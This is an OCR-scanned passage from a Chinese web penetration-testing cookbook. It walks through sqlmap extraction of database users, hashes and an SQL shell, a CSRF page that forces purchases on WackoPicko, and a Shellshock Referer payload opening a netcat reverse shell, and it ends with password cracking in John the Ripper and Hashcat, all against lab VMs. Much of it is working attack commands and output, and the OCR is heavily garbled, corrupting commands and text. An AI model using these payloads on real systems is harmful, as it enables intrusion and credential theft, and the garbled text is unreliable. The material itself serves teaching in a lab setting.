数据 库 ，1 ce m 知道 我 们 发 现 了 长 度 。 知 道 何 
时 停止 用 户 名 长 度 的 搜索 非常 


在 找到 长 度 之 后 ， 我 们 使 用 相同 的 技巧 来 发 现 首 字母 ， LIKE 'b%' 语句 告诉 SQL 解释 器 是 
ee CEP ERE UnE Ao EIE S 
这 里 ， 我 们 看 到 了 首 字母 是 s 。 使 用 相同 的 技巧 ， 我 们 就 能 发 现 第 二 个 字符 ， 并 得 到 整个 名 
ER o 


P 


这 个 攻击 可 以 继续 来 获得 DBMS 的 版 本 ， 之 后 使 用 厂商 特定 的 命令 来 观察 是 否 用 户 拥有 管理 
权限 。 如 果 有 是 的 话 ， 你 可 以 提取 所 有 用 户 名 和 窒 码 ， 激 活 远程 连接 ， 以 及 除 此 之 外 的 许多 事 


情 o 


你 可 以 尝试 的 事情 之 一 就 是 使 用 SQLMap 来 利用 型 的 注入 。 


还 有 另 一 种 类 型 的 盲 注 ， 它 是 基于 时 间 的 SQL 盲 注 。 其 中 我 们 没有 可 视 化 的 线索 ， 关 于 命令 
是 否 被 执行 ( 就 像 有 效 或 者 无 效 的 账户 信 &) o 反之， 我 们 A 数据 库 发 送 sleep 命令 ， 

如 果 响 应 时 间 铝 鱼 我 们 发 送 的 时 间 ， 那 么 它 就 是 丰 的 响应 。 这 类 型 的 攻击 非常 缓慢 ， 因 为 它 
有 时 需要 等 待 30 秒 来 获得 仅仅 一 个 字符 。 Po sqlninja SQLMap 的 工具 在 这 种 情 
况 下 十 分 有 用 ( https://www.owasp.org/index.php/Blind SQL Injection ) E 


7.5 使 用 SQLMap 获得 数据 库 信 息 


在 第 六 章 中 ， 我 们 使 用 了 SQLMap 来 从 数据 库 提取 信息 和 表 的 内 容 。 这 非常 实用 ， 但 是 这 不 
仅仅 是 这 个 工具 的 优势 ， 也 不 是 最 有 趣 的 事情 。 这 个 秘籍 中 ， 我 们 会 将 其 用 于 提取 关于 数据 
库 用 户 和 密码 的 信息 ， 这 可 以 让 我 们 访问 整个 系统 ， 而 不 仅仅 是 应 用 。 


TETTE JE 


1. Æ sh Bee-box 虚拟 机 之 后 ， 将 BurpSuite 监听 用 做 代理 ， 登 录 和 选择 SQL 注入 漏洞 
(POST/Search) 。 


2， 输 入 任何 电影 名 称 并 点 击 search ° 


现在 让 我 们 访问 BuirpSuite 并 查看 请 求 : 





[rese | Response | 


Raw Params Headers "Hex | 








POST /bwAPP/sqli 6.php HTTP/1.1 

Höst: 192. 1658. 56. 103 

User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:18.0) Gecko/20100101 Firefox/18.0 
Accept: text/html,application/xhtml4xml,application/xml;q-0.5,*/*:0-0.8 
Accept-Language: en-US,en;q-0.5 

Accept-Encoding: gzip, deflate 

Referer: http://192.1568.56. 1O3/bwAPP/sqli 6.php 

Cookie: PHPSESSID-1SbfbSbeaS82d4cB86eeSO096adcfdb2e0; security level-o 
Connection: keep-alive 

Content-Type: application/x-www-form-urlencoded 

Content-Length: 25 


titlezmovie&actionzsearch 


4. 现在 ， 在 Kali 中 访问 终端 并 输入 以 下 命令 : 


sqglmap -u "http://192.168.56.103/bWAPP/sqli 6.php" --cookie-"PHPS ESSID=15bfb5b6a9 
82d4c86ee9096adcfdb2e0; security level-0O" --data "title-test&action-search" -p tit 
le --is-dba 


[23:50:24] [INF0] the back-end DBHS is MysS0L 

web server operating system: Linux Ubuntu 8.04 (Hardy Heron) 
web application technology: PHP 5.2.4, Apache 2.2.8 
back-end DBMS: MySQL 5.8.12 


current user is DBA: Trua 





[*] shutting down at 23:56 


我 们 可 以 看 到 注入 成 功 了 。 当 前 的 用 户 是 DBA， 这 意味 着 用 户 可 以 对 数据 库 执行 管理 员 
321E > dn] de Jm FE] Po PCR RB o 


5. 现在 我 们 打算 提取 更 多 信息 ， 例 如 用 户 和 密码 ， 所 以 在 终端 中 输入 以 下 命令 : 


sqlmap -u "http://192.168.56.103/bWAPP/sqli 6.php" --cookie="PHPS ESSID=15bfb5b6a9 
82d4c86ee9096adcfdb2e0; security_level=0" --data "title-test&action-search" -p tit 
le --is-dba --users --passwords 


‘六 "bee-box 
六 Localhos 
debian-sys-maint'a'localhost 
"mE - 
root'a'% 
root'@'l27.0.0.1' 
'root'ü'bee-box 


root 和 Localhost 


do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n 
database management system users password hashes: 
[*] debian-sys-maint [1]: 
password hash: *D4/49CRCGFE/7E93F4A942F 787C 22249104A 
[*] root [1]: 


password hash: *O7BDCCE30E93A12AA2B693FD99990F044614A3E5 


[*] shutting down at 98:28:11] 





`~ 


我 们 现在 得 到 了 数据 库 的 用 户 列 表 以 及 哈 厦 后 的 密码 。 


6. 我 们 也 可 以 获得 shell， 让 我 们 能 够 直接 发 送 SQL 查询 到 数据 库 。 


sqlmap -u "http://192.168.56.103/bWAPP/sqli 6.php" --cookie="PHPS ESSID=15bfb5b6a9 
82d4c86ee9096adcfdb2e0; security_level=0" --data "title-test&action-search" -p tit 
le -sql-shell 


Ll Er Lm BE! TI E. ] [| i 
Lng system: Linux UBuñtuU 8.54 [Hardy Heron) 
| s J Y 2 z È P 5 1 Fi r a [] Á p a C L e P, 1 F. r B 


dina o E rarae E Varo 
23,0 a FO -AUDU TELLS 


> ðw QHaäatabhases : 


* from information schema.schemata; 


nformation schema. Enen ata: [4]: 
fB general P information schema, 
tini swedish ci, DbwA WPP 
swedish ci, drupageddon, 
Latinl latin] swedish ci, mysql, 





工作 原理 
一 旦 我 们 知道 了 存在 SQL 注入 ， 我 们 使 用 SQLMap 来 利用 它 ， 像 这 样 : 


sqlmap -u "http://192.168.56.103/bWAPP/sqli 6.php" --cookie="PHPS ESSID=15bfb5b6a982d4 
c86ee9096adcfdb2e0; security_level=0" --data "title-test&action-search" -p title --is- 
dba 


在 这 个 对 SQLMap 的 调动 中 ， 我 们 使 用 了 --cookie 参数 来 发 送 


份 验证 来 访问 sqli 6.php 页 面 。 --data 参数 包含 发 送 到 服务 器 
SQLMap 仅仅 注入 title 参数 ，--is-dba 询问 数据 库 当 前 用 户 


会 话 Cookie 因为 应 用 需要 身 
POST 数据 ， =p 告诉 
hiik 理 员 权限 。 


DBA 允许 我 们 向 数据 库 询 问 其 他 用 户 的 信息 ，SQLMap 通过 --users 和 --passwords 使 我 们 
EJ ARTE SER E Im S mend 问 用 户 名 和 均码 ， 因 为 所 有 DBMS 3E A P 69RA Jm R h 
储 ， 我 们 获得 的 只 能 是 哈 希 。 所 以 我 们 仍然 要 使 用 密码 破解 器 来 破解 它们 。 如 果 你 在 
SQLMap 询问 你 执行 字典 攻击 的 时 候 回答 Yes ， 你 可 能 就 知道 了 至 少 一 个 用 户 的 轿 码 。 


s MN 1 shell » 3x t RR. 
的 shell> 2374 > SQLMap 通过 SQL 注入 发 送 我 们 写 ' JR "h 询 的 结果 。 


7.6 执行 CSRF 攻击 


eiiim 身份 验证 后 的 用 户 在 Web 应 用 中 执行 需要 身份 验证 的 ， 非 预期 的 行为 。 这 可 
以 通过 用 户 所 浏览 的 外 部 站 点 触发 该 行为 来 实现 。 


这 个 秘籍 中 ， 我 们 会 获取 应 用 中 的 信息 RN ET — 求 给 漏洞 服 
务 器 。 之 后 ， A 建 页 面 来 模拟 正常 请 求 并 诱 使 用 户 在 身份 验证 后 访问 这 个 页 面 。 恶 意 
页 面 之 后 会 发 送 请 求 给 漏洞 服务 器 ， 如 果 应 用 在 相同 浏览 器 中 打开 ， ipii. > 好像 用 


为 了 执行 CSRF 攻击 ， 我 们 使 用 vulnerable vm 中 的 WackoPicko 应 
用 : http://192.168.56.102/WackoPicko 。 我 们 需要 两 个 用 户 ， 一 个 叫做 v_user ^ o xS 


另 一 个 叫做 attacker ° 


qs) 
de 


我 们 也 需要 启动 BurpSuite 并 将 其 配置 为 服务 器 的 代理 。 


操作 步骤 
1， 作 为 attacker 登录 WackoPicko。 


2. 攻击 者 首先 需要 了 解 应 用 的 行为 ， 所 以 如 果 我 们 发 酸 使 用 户 购买 我 们 的 图 片 ， 将 
BurpSuite 用 作 代 理 ， 我 们 需要 浏 
览 : http://192.168.56.102/WackoPicko/pictures/recent.php ? 


3. 选项 ID 为 8 的 图 片 : http://192.168.56.102/WackoPicko/ pictures/view.php?picid-8 ° 
4. 点 击 Add to Cart ° 

5. 会 花费 我 们 10 个 Tradebux， 但 这 是 值得 的 ， 所 以 点 击 Continue to Confirmation ° 

6 在 下 一 页 上 ， 点 击 Purchase ° 

T. 现在 ， 让 我 们 访问 BurpSuite 来 分 析 发 生 了 什么 。 


第 一 个 有 趣 的 调用 是 /WackoPicko/cart/action. php?action-add&picid-8 ? 它 是 添加 图 H 
到 购物 车 的 请 求 ° /WackoPicko/cart/confirm.php A 点 击 相 应 按钮 时 调用 ， 它 可 能 必 
须 用 于 购买 。 田 一 个 可 被 攻击 者 利用 的 是 购买 操作 的 POST A 

用 : /wackoPicko/cart/action. php?action-purchase ^*^ 他 告诉 应 用 将 图 HA 添加 到 购物 车 T 
并 收 相 应 的 Tradebux » 


# 2| Host | Method | URL | Params |Edited |Status | Length 
— = a — € 


Fr A a PT 


Pr TEE TI uc m. TT We. 





[EIL IEEE HS 
GCH CECI] 


200 3434 


|8B  http/182.168.55.102 GET JWackoPicko]pictures/purchased.php — 
| 


Request | Response | 





8. 现在 攻击 者 需要 上 传 图 片 来 强迫 其 它 用 户 购 买 E 登录 为 attacker 之 后 ， 访 
站 Upload ^? 填充 所 需 信 息 ' 选项 需要 上 传 的 文件 ， 点 击 UploadFile ° 
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Upload a Picture! 


Tag: test 

File Mame : attacker Image 

Title You've been owned 

Price : 15 

File : [nu ÉH-ages.peg, Browse... 
Upload File 


一 旦 图 片 只 上传 ， 我 们 会 直接 重 定 向 到 它 的 相应 页 面 ， 你 可 以 在 这 里 看 到 : 


] 192,1658,55,102/ X/pictures/view.php?picid- 16 


[| 


要 注意 为 图 片 分 配 的 ID， 它 是 攻击 的 核心 部 分 ， 这 里 它 是 16。 


9 一 旦 我 们 分 析 了 购买 流程 ， 并 拥有 了 图 片 ID， 我 们 需要 局 动 托管 恶意 页 面 的 服务 器 。 在 
Kali 中 以 root 用 户 启动 Apache 服务 器 ， 像 这 样 


service apache2 start 


10. 之 后 ， 创 建 HTML 文件 ， 叫 做 /var/www/html/wackopurchase.html ， 带 有 如 下 内 容 : 


<html> 

<head></head> 

«body onLoad='window.location="http://192.168.56.102/ WackoPicko/cart/action.php?a 
ction-purchase";setTimeout("window. close;",1000)'» 

«hi»Error 404: Not found</h1> 

«iframe src-z"http://192.168.56.102/WackoPicko/cart/action. php?action-add&picid-16" 
> 

«iframe srcz"http://192.168.56.102/WackoPicko/cart/review.php" > 

<iframe src="http://192.168.56.102/WackoPicko/cart/confirm.php"> 

</iframe> 

</iframe> 

</iframe> 

</body> 


[7| 








- 


这 个 代码 会 我 们 的 商品 的 发 送 add ^ review 和 confirm 请 求 给 WackoPicko ， 之 后 展示 
404 页 面 给 用 户 ， 当 它 加 载 完成 后 ， 它 会 重 定 向 到 购买 操作 ， 之 后 在 一 秒 后 关闭 窗口 。 


11. 现在 以 v user 登录 ， 上 传 图 片 并 登 出 。 


12. 作为 攻击 者 ， 我 们 需要 确保 用 户 访问 我 们 的 恶意 站 点 ， 同 时 仍然 保持 登录 WackoPicko 。 
以 attacker 登录 之 后 ， 访 问 Recent 并 选择 属于 v user 的 图 片 (刚刚 上 传 的 那个 ) o 


13， 我 们 需要 在 图 片上 输入 下 列 评论 。 


14. 


15. 


16. 


1T. 


18. 


19. 


20. 


This image looks a lot like «a hrefz"http://192.168.56.1/ wackopurchase.html" targ 
et-" blank">this</a> 


译 者 注 i iix —3p 8m Hj 4x 2E 页 面 上 存在 XSS ， 没有 的 话 利 用 社会 工程 直接 发 送 关 链接 也 
是 可 行 的 。 


点 击 Preview 过 三 Create ° 





Comments 


This Image looks a lot like this 


. by attacker 


你 可 以 看 到 ， 评 论 中 人 允许 HTML RA > 6E. v user 点 击 链接 是 ， 我 们 的 恶意 页 面 会 在 
新 留 口 打开 。 


登 出 并 以 v user 登录 。 

访问 Home 并 点 击 Your Purchased Pics ， 这 里 应 该 没有 攻击 者 的 图 片 。 
骨 次 访问 Home ， 之 后 访问 Your Uploaded Pics ° 

选项 带 有 攻击 者 评论 的 图 片 。 

点 击 评论 中 的 链接 。 


WackaPicko,corn x 六 htt 4/192.1...rchase.html x 4 
m-|j192.16B8.55.1/wackopurchase.html 


* Error 404: Not found 














" 

+ 

wE 

D 

3 

iui 

E 
当 它 完全 加 载 之 后 ， 你 应 该 看 到 文本 框 中 的 一 些 WackoPicko 的 文本 ， 这 个 窗口 会 在 一 


秒 之 后 关闭 ， pn 成 了 。 


如 果 我 们 访问 Home ， 你 可 以 看 到 v user. 的 Tradebux 余额 现在 是 85 ° 


Hello v user, you got 85 Tradebuxs to spend! 
Cool stuff to da: 
Who's got a similar name to you? 


Your Uploaded Pics 
Your Purchased Ps 


21. 现在 访 
中 Your Purchased Pics : http://192.168.56.102/WackoPicko/ pictures/purchased.php 来 


查看 非 预 期 购买 的 图 片 : 


WackoPicko,corn x htt 4/192.1...rchase.html x 
= NECE 
TT 192.168,56. 1/wackopurchase.htm!l 


* Error 404: Not found 


CM e ur 
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对 于 CSRF 工具 者 ， 成 功 执 行 漏洞 需要 预 置 条 件 。 首 先 ， 我 们 需要 了 解 执 行 特殊 操作 所 需 的 
请 求 参数 ， 以 及 我 们 需要 在 所 有 情况 中 都 处 理 的 响应 。 


这 个 秘籍 中 ， 我 们 使 用 了 代理 和 有 效用 户 账 户 来 执行 我 们 所 需 的 操作 ， 来 复制 和 收集 所 需 信 
A : 购买 过 程 中 涉及 到 的 请 求 ， 这 些 请 求 所 需 的 信息 ， 以 及 执行 它们 的 正确 顺序 


一 旦 我 们 知道 了 需要 向 应 用 发 送 什 么 ， 我 们 需要 将 其 自动 化 ， 所 以 我 们 启动 Web 服务 器 ， 并 
准备 页 面 使 调用 以 正确 顺 友 和 正确 参数 执行 。 通 过 URM onLoad JS 时 间 ， 我 们 确保 购买 
在 add 和 confirm 调用 之 前 不 会 执 行 。 


在 每 个 CSRF 攻击 中 ， 都 必须 有 方法 让 用 户 访问 我 们 的 恶意 站 点 ， 同 时 保持 正常 站 点 的 登 
录 。 这 个 秘籍 中 ， 我 们 使 用 应 用 的 特性 ， 它 的 评论 允许 HTML 代码 ， 并 可 以 在 这 里 输入 链 
接 。 所 以 当 用 户 点 击 某 个 图 片 评论 中 的 链接 时 ， 它 就 向 我 们 的 Tradebox 资 取 站 点 发 送 了 请 
X e 


最 后 ， 当 用 户 访 问 我 们 的 站 点 时 ， 它 模拟 了 错误 页 面 ， 并 在 购买 请 求 刚刚 完成 后 关闭 自己。 

在 这 里 我 们 并 不 需要 担心 渗透 ， 所 以 错误 页 面 可 以 改进 一 下 使 用 户 不 怀疑 它 。 这 通过 HTML 

标签 中 的 onload 事件 中 的 JavaScript 命令 (购买 操作 的 调用 ， 和 用 于 关闭 窗口 的 计时 
器 ) 来 完成 。 这 个 时 间 在 页 面 的 所 有 元 系 完 全 加 载 之 后 触发 ， 换 名 话说 ， 

当 add ^ review 和 confirm 的 步骤 完成 之 后 。 


7.7 使 用 Shellsock 执行 命令 


Shellshock (也 叫 作 Bashdoor) 是 个 在 2014 年 九 月 发 现在 Bash shell 中 的 bug， 人 允许 命令 通 
过 储存 在 环境 变量 中 的 函数 来 执行 。 


Shellshock 和 我 们 渗透 测试 者 有 关系 ， 因 为 开发 者 有 时 候 允 许 我 们 在 PHP. 或 CGI 脚本 中 调 
用 系统 命令 -- 这 些 脚 本 可 以 利用 系统 环境 变量 。 


这 个 秘籍 中 ， 我 们 会 在 Bee-box 漏洞 虚拟 机 中 利用 Shellshock 漏洞 来 获得 服务 器 的 命令 执行 


权 。 


TRE 2v Wi 
1. 登录 http://192.168.56.103/bWAPP/ ° 


2. 在 Choose your bug 下 拉 框 中 选 先 择 Shellshock Vulnerability (CGI) ? 之 后 点 击 Hack ° 


Shellshock Vulnerability (CGI) , 





在 文本 中 ， 我 们 看 到 了 一 些 有 趣 的 东西 ; Current user: ww-data 。 这 可 能 意味 着 页 面 使 
用 系统 调用 来 获得 用 户 名 。 它 给 了 我 们 提示 : Attack the referrer ° 


3， 让 我 们 看 看 背后 有 什么 东西 ， 使 用 BurpSuite 来 记录 请 求 并 重复 步骤 2 


4. 让 我 们 查看 代理 的 历史 : 


9 Ain (192, 168. 56. 5.103 POST seda aed SaL [t] [本 302 4798 HTML 





«div id-"main"» 


«h1»5hellshock Vulnerability (CGI)«e/h15 


«p»The version of Bash is wulnerable to the BHash/Shellshock bug! («a 
hrefz"http://sourceforge.net/proJects/bwapp/files/bes-bnox/' targets" blank"shbee-boxz/a» anly)«/p- 


cp»HINT: attack the referer header, and pwn this box...-/p- 


<iframe frameborder-"O" srest. /cgi-b "| height=" 200" width="600" scrallingz'no'z«/iframe» 





</div> 


我 们 可 以 看 到 ， 有 个 iframe 调用 了 shell 脚本 : ./cgi-bin/shellshock.sh ， 这 可 能 存在 
Shellshock 漏洞 。 


让 我 们 跟随 提示 并 尝试 攻击 shellshock.sh 。 所 以 我 们 首先 需要 配置 BurpSuite 来 拦截 服 


务 器 的 响应 ， 访 问 Proxy 标签 页 的 options ， 并 选 
中 Intercept responses based on the following rules 的 选择 框 。 


现在 ， 让 BurpSuite 拦截 和 重新 加 载 shellshock.php ° 


在 BurpSuite 中 ， 点 击 Forward 直到 得 到 了 /bwAPP/cgi-bin/ shellshock.sh 请 求 ， 之 后 


将 Referer 替换 为 


QUU End me st uo Hrs agi 


Ed Request to http://192,168.56,103:80 
| Forward | | | Drop | | Intercept is on | | Action 


GET /bwAPP/cgi-bin/shellshock.sh HTTP/1.1 

Host: 1592.168.56.103 

User-Agent: Mozilla/5.0 (X11; Linux x86 64; rv:18.0) Gecko/20100101 Firefox/18.0 
Accept: text/html,application/xhtml*xml, application/xml; q=0.9, */*;q=0.8 
Accept-Language: en-US,en; q=0.5 

Accept-Encoding: gzip, deflate 

Referer: | V 

Cookie: PHPSESSID-2118a6e534bcc8bcc6d778a7239ce5al; security level-o 

Connection: keep-alive 








再 次 点 击 Forward ， 在 .ttf 文件 的 请 求 中 ， 我 们 应 该 能 得 到 shellshcok.sh 的 响应 ， 像 


这 样 : 


Response from http://192.168.56.103:80/bWAPPjcqi-bin/shellshock.sh 






| Forward | Drop | dnterceptis on | | Action | 
HTTP/1.1 200 OK 


Date: Sun, 25 Oct 2015 01:29:11 GMT 
Server: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntuS5 with 


OpenSSL/0O.9.8g 


Keep-Alive: timeout-15, max-100 
Connection: Keep-Alive 
Content-Type: text/html 
Content-Length: 288 


现在 响应 多 了 一 个 协议 头 参 数 ? 叫做 Vulnerable °° 这 是 因为 它 将 echo 命令 的 输出 集成 


到 HTTP 协议 关中 ， 所 以 我 们 可 以 进一步 利用 它 。 


9， 现 在 使 用 下 列 命令 重复 这 个 过 程 : 


() { :;}; echo "vulnerable:" $(/bin/sh -c "/sbin/ifconfig") 


D 


Response from http:;//192.168,56.103:80/bwAPPj[cgi-bim/shellshack.sh 


Forward | Drop | | Intercept is on | | Action | 





c 
Raw | Headers | Hex 





HITP/Il.1 200 OK 
Date: Sun, z5 Oct 2015 01:42:14 GMT 
Sarver: Apache/2.2.8 (Ubuntu) DAV/2 mod fastcgi/2.4.6 PHP/5.2.4-2ubuntus with Suhosin-Patch mod ssl/2.2.8 
OpenssL /0. 9.99 
vulnerable: eth1 Link encap:Ethernet Hdaddr 08:00:27:9b:58:58 
inet addr: 192.168.56.103 Bcast:192.168.558.255  Mask:255.255.255.0 
inet addr: feBO::a00:27t1f:feSGb:bo958/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU: 1500 Metric:l 
RX packets: 2287 errors:O dropped:O overruns:O frame:Q 
TX packets: 2108 errors:O dropped:O overruns:O carrier:ü 
collisions: O txqueuelen: 1000 
RX bytes: 374103 [365.3 KB) TX bytes:1388968 (1.3 MB) 
Base address: OxdOl0 Memory:fooooo0oO-foo20000 
Keep-Alive: timeoutzl5, max-1l00 
Connection: Keep-Alive 
Content-Type: text/x-sh 
Content-Length: 721 


10. 能够 在 远程 服务 器 上 执行 T > Med 渗透 测试 来 说 是 个 巨大 的 优势 ， 下 一 步 自 然 是 获得 
远程 shell。 在 Kali 中 打开 终端 ， 监 听 网 络 端口 ， 像 这 


nc -vlp 12345 





11. 现在 访问 BurpSuite 的 代理 历史 ， 选 择 任何 shellshock.sh 的 请 求 ， 右 击 它 并 发 送 
Repeater， 像 这 样 








intercept | HTTP history | webSockets history | Options | 





| Filter: Hiding CS5, image and general binary content 


# à Host Method | URL |Params E 


176 wu REEREII EUN GET bara i b ca js L] 
* imd T nttp: i 192.168 í 30.103 ar! [OWAPP[Cqi-bin/she Lil hock.sl O B IL 

http:/192.168.56.103/bWAPP/cqi- TERRE sh kactsdaughtari tf B 

Add to scope php = 

一 一 E: 

pier from here ehock sh z 


In activa scan tectsdaughter.ttf l 





Send to Intruder 





Send to Repeater Ciril +R 


Send to Sequencer 


12. 在 Repeater ¥ > 144 rx Referer 的 值 为 : 


() { :;}; echo "Vulnerable:" $(/bin/sh -c "nc -e /bin/bash 192.168.56.1 12345") 


i& Y » 192.168.56.1 RTI Kali 主机 的 地 址 。 


13. Xd Go ° 


14. 如果 我 们 检查 我 们 的 终端 ， 我 们 可 以 看 到 连接 已 建立 ， 执 行 一 些 命 令 来 检查 我 们 是 否 得 
到 了 远程 shell。 


:=# nc -LVP 12345 
listening on NUI 12345 
connect to [192.168.56.1] from bee-box.loc. 
whoami 
www-data 


uname -A 
Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686 GNU/Linux 


Mimpi 
:O:root:/root:/bin/bash 
:1:1:daemon:/usr/sbin:/bin/s 

^ :bin:/bin:/bin/sh 
:SYyS:/ 'dev : /bin/sh 
à:sync:/Dbin:/Din/sync 

Bn /usr/games: /bin/s 





工作 原理 


在 第 一 步 中 ， 我 们 发 现 了 shell 脚本 的 调用 。 因 为 它 可 以 被 shell 解释 器 运行 ， 它 可 能 是 漏 派 
版 本 的 bash。 为 了 验证 ， 我 们 执行 了 下 列 测 试 : 


() € :;); echo "vulnerable:" 


第 一 个 部 分 () Cu; 是 个 空 函 数 ， 因 为 bash 可 以 将 函数 储 AS i 是 漏洞 的 核 
心 。 在 函数 结束 之 后 ， 解 析 器 会 继 多 eh eR 这 允许 我 们 执行 第 二 个 部 
分 echo "Vulnerable: ， 这 是 简单 返回 输入 的 命 


Web 服务 器 中 存在 漏洞 ， 因 为 CGI 事先 将 请 求 的 所 有 部 分 映射 为 环境 变量 ， 所 以 这 个 攻击 通 
过 User-Agent 或 者 Accept-Language 也 能 工作 。 


一 旦 我 们 知道 了 服务 器 存在 漏洞 ， 我 们 键入 测试 命令 ifconfig 并 建立 反 向 shell 。 


RA shell 是 一 种 远程 shell， 它 的 特点 是 由 受害 者 主机 初始 化 ， 攻 击 者 监听 连接 ， 而 不 是 服 
务 器 在 绑 定 连接 中 等 待 客户 端的 连接 。 


~ 


7.8 使 用 John the Ripper F- F Jt R 9X AF 95/85 "6 ds 


在 上 一 个 秘籍 ， 以 及 第 六 草 中 ， 我 们 从 数据 库 中 提取 了 窗 码 哈 布 。 在 执行 渗透 测试 的 时 候 ， 
有 时 候 这 是 唯一 的 用 于 发 现 窒 码 的 方式 。 为 了 发 现 站 实 的 完 码 ， 我 们 需要 破译 它们 。 由 于 哈 
硕 由 不 可 逆 的 函数 生成 ， 我 们 没有 办 法 直接 解密 密码 。 所 以 使 用 慢 速 的 方法 ， 例 如 暴力 破解 
和 字典 攻击 就 很 有 必要 。 


这 个 秘籍 中 ， 我 们 会 使 用 John the Ripper (JTR 或 John) ， 最 流行 的 宅 码 破解 器 ， 从 第 六 
逐步 执行 基本 的 SQL 注 入 "秘籍 中 提取 的 哈 希 中 恢复 密码 。 


RES 


1. 虽然 JTR 对 接受 的 输入 非常 灵活 ， 为 了 防止 错误 解释 ， 我 们 首先 需要 以 特定 格式 设置 用 
P o Sk a v a 创建 叫做 hashes 6 7.txt 的 文本 文件 j 每 行 加 称 和 一 个 哈 
项， 以 冒号 分 隔 ( username:hash ) ， 像 这 术 


Open w Ia hashes 6 7.txt 
和 | L| 


] admin:21232f297a5/a5a7/43894a0e4a801 fc3 

2 gordonb:eS98al8c428cb38d512508536/8922603 
31337 :8d3533d75ae2c 38656d7eO8dAÀ fcc692165b 

4 pablo:OdlO/dOSf5bbe4d0cade3deb5c/1e9e9b/ 

5 snithy:5f4dcc3b5aa765d61d8327deb882c f99 
b user:eellcbbl9052e40b0/aacOcaO060c23ee 


2. 一 旦 我 们 拥有 了 这 个 文件 ， 我 们 可 以 打开 终端 并 执行 下 列 命令 


john --wordlist-/usr/share/wordlists/rockyou.txt --format-raw-md5 hashes 6 7.txt 


:= 者 john --wordlist-/usr/share/wordlists/rockyou.txt --fTormat-raw-md5 has 
T3 Inr E dob : Anput " ene: ng: Ji F-B 
aaded E different salts (Raw-MD5 [MD5 128/128 SSE2 4x3]) 
Warning: na 和 Suppo Ft T HIE hash type, consider - - førk=g 
Press 'q' or Ctrl-C to abort, almost any other key for status 
(sm thy] 
| qor donb] 


( admin) 
00:01 DONE (2015-10-25 20:55) 3.597g/s 10319% KPA s 103 j19Kc/s TosoKC/s 
i option to display all of the cra 





我 们 使 用 Kali 预 置 的 单词 列表 之 一 。 我 们 可 以 看 到 单词 列表 中 六 个 密码 发 现 了 五 个 ， 我 
们 也 能 发 现 ，John 每 秒 能 比较 10,336,000 次 (10,336 KC/s) œ 


3. John 也 有 选项 来 应 用 修改 器 规则 -- 添加 前 后 级 ， 修 改 大 小 写 ， 以 及 在 每 个 密码 上 使 用 
leetspeak » iE RME 15 2A ZR 9X RE 0 95 85 E AX : 


john --wordlist-/usr/share/wordlists/rockyou.txt --format-raw-md5 hashes 6 7.txt - 
rules 


# john --wordlist=s/usr/share/wordlists/rockyou.txt --tormat=sraw-md5 hashes _6& 7.txt --rules 
ising default input encoding: UTF-8 
Loaded 6 password hashes with ne ditterent salts (Raw-MDS [MDS 126/128 SSE2 ID 
Remaining 1 password hash 
Warning: no OpenMP support for HUE hash type, consider --forkszB 


Press "q' E Ctrl-C to abort, almost any other key for status 
üg OQ: :18 15.40% (ETA: 22:02 :O07) Og/s 2456Kp/s 2456Kc/s 2456KC/s lgannon..lgangstame 
TET-s (user | 


19 0:00: 00:50 DONE (2015-10-25 01) 0.01969g/s 2100Kp/s 2100Kc/s 2100KC/s vampıro..tonyz2000 
a 


-show"' option ta displ av all of the cracked i reliably 





我 们 可 以 看 到 这 个 规则 生效 了 ， 我 们 得 到 了 最 后 一 个 密码 。 


工作 原理 


John (以 及 任何 离线 密码 破解 器 ) 的 工作 方式 是 计算 列表 (或 所 生成 的 ) 单词 的 哈 布 ， 并 将 
它们 与 需要 被 破解 的 哈 希 对 比 ， 当 存在 匹配 时 ， 它 就 假设 密码 找到 了 。 


第 一 个 命令 使 用 --wordlist 选项 告诉 John 要 使 用 什么 单词 。 如 果 和 忽略 了 它 ， 它 会 生成 自己 
的 列表 来 执行 爆破 攻击 。 --format 选项 告诉 我 们 要 使 用 什么 算法 来 生成 哈 希 ， 如 果 这 个 选项 
被 忽略 ，John 会 猜测 它 ， 通 常 带 有 不 错 的 结果 。 最 后 ， 我 们 将 包含 想 要 破解 的 哈 希 的 文件 传 
入 o 


1， 我 们 可 以 通过 使 用 --rules AA RX PRE RBMA *. AA ERRA X gg R 
破解 的 时 候 ， 它 会 使 用 人 们 对 单词 所 做 的 第 用 修改 。 例 如 ， 对 于 password. ，John 也 会 尝 
斌 下面 的 东西 : 


2. Password 


3. PASSWORD 
4.  password123 


b. Pa$$wOrd 


7.9 使 用 oclHashcat/cudaHashcat 154k 9€ 49 AA 


也 近 ， 显 卡 的 发 展 取得 了 巨大 突破 ， 这 种 臣 片 中 含有 成 吾 上 二 个 处 理 器 ， 它 们 都 并 行 工 作 。 
这 里 ， 当 应 用 在 密码 破解 上 是 ， 这 意味 着 ， 如 果 单 个 处 理 每 秒 可 以 计算 一 万 个 哈 希 ， 一 个 带 
有 上 千 内 核 的 GPU 就 能 够 计算 一 千 万 个 。 这 可 以 将 破解 时 间 降 至 一 千 分 之 一 。 


现在 我 们 使 用 Hashcat 的 GPU 版 本 来 爆破 冤 码 。 如 果 你 在 N 卡 的 电脑 上 安装 的 Kali， 你 需 
要 cudeHashcat。 如 果 它 安装 在 A 卡 的 电脑 上 ， 则 需要 oclHashcat。 如 果 你 在 虚拟 机 上 安装 
kali > GPU 破解 可 能 不 工作 ， 但 是 你 始终 可 以 在 你 的 主机 上 安装 它 ，Windows 和 Linux 上 都 
有 它 的 版 本 。 


这 个 秘籍 中 ， 我 们 会 使 用 oclHashcat， 它 和 cudaHashcat 的 命令 没有 区 别 ， 哩 然 AFATA 
码 破 解 更 加 高 效 。 


准备 
我 们 需要 确保 你 正确 安装 了 显卡 驱动 ，oclHashcat 也 兼容 它们 ， 所 以 你 需要 做 这 些 事情 : 


1. 单独 运行 oclHashcat， 如 果 出 现 问 题 它 会 告诉 你 。 
oclhashcat 
2. 测试 它 在 跑 分 模式 中 支持 的 每 种 算法 的 哈 希 率 。 


oclhashcat --benchmark 


3， 取 决 于 你 的 安装 ，oclHahcat 可 能 需要 在 你 的 特定 显卡 上 强行 工作 : 
oclhashcat --benchmark --force 


我 们 会 使 用 上 一 个 秘籍 的 相同 哈 布 文件 。 


